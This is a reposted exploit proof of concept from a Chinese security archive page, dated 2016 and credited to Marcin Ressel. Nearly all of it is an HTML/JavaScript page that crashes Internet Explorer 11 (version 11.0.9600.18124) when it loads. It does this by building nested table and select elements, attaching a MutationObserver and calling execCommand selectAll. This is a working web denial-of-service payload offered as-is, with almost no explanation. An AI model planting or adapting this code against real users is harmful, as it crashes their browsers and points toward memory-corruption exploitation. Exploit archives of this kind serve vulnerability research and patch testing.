|
Internet Explorer 11.0.9600.18124 EdUtil::GetCommonAncestorElement - Denial of S
|
|
来源:https://twitter.com/m_ressel 作者:Ressel 发布时间:2016-01-14
|
|
<!doctype html>
<html>
<head>
<meta http-equiv='Cache-Control' content='no-cache'/>
<title>EdUtil::GetCommonAncestorElement Remote Crash</title>
<script>
/*
* Title : IE11 EdUtil::GetCommonAncestorElement Remote Crash
* Date : 31.12.2015
* Author : Marcin Ressel (https://twitter.com/m_ressel)
* Vendor Hompage : www.microsoft.com
* Software Link : n/a
* Version : 11.0.9600.18124
* Tested on: Windows 7 x64
*/
var trg,src,arg;
var range,select,observer;
function testcase()
{
document.body.innerHTML ='<table><colgroup></colgroup><table><tbody><table><table></table><col></col></table></tbody></table></table><select><option>0]. option</option><option>1]. option</option></select><ul type="circle"><li>0]. li</li><li>1]. li</li><li>2]. li</li><li>3]. li</li></ul><select><option>0]. option</option><option>1]. option</option><option>2]. option</option><option>3]. option</option><option>4]. option</option><option>5]. option</option><option>6]. option</option><option>7]. option</option></select>';
var all = document.getElementsByTagName("*");
trg = all[9];
src = all[2];
arg = all[12];
select = document.getSelection();
observer = new MutationObserver(new Function("","range = select.getRangeAt(258);"));
select.selectAllChildren(document);
document.execCommand("selectAll",false,'<ul type="square"><li>0]. li</li><li>1]. li</li><li>2]. li</li><li>3]. li</li><li>4]. li</li><li>5]. li</li><li>6]. li</li></ul><select><option>0]. option</option><option>1]. option</option><option>2]. option</option><option>3]. option</option><option>4]. option</option><option>5]. option</option><option>6]. option</option><option>7]. option</option></select>');
}
</script>
</head>
<body onload='testcase();'>
</body>
</html>
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
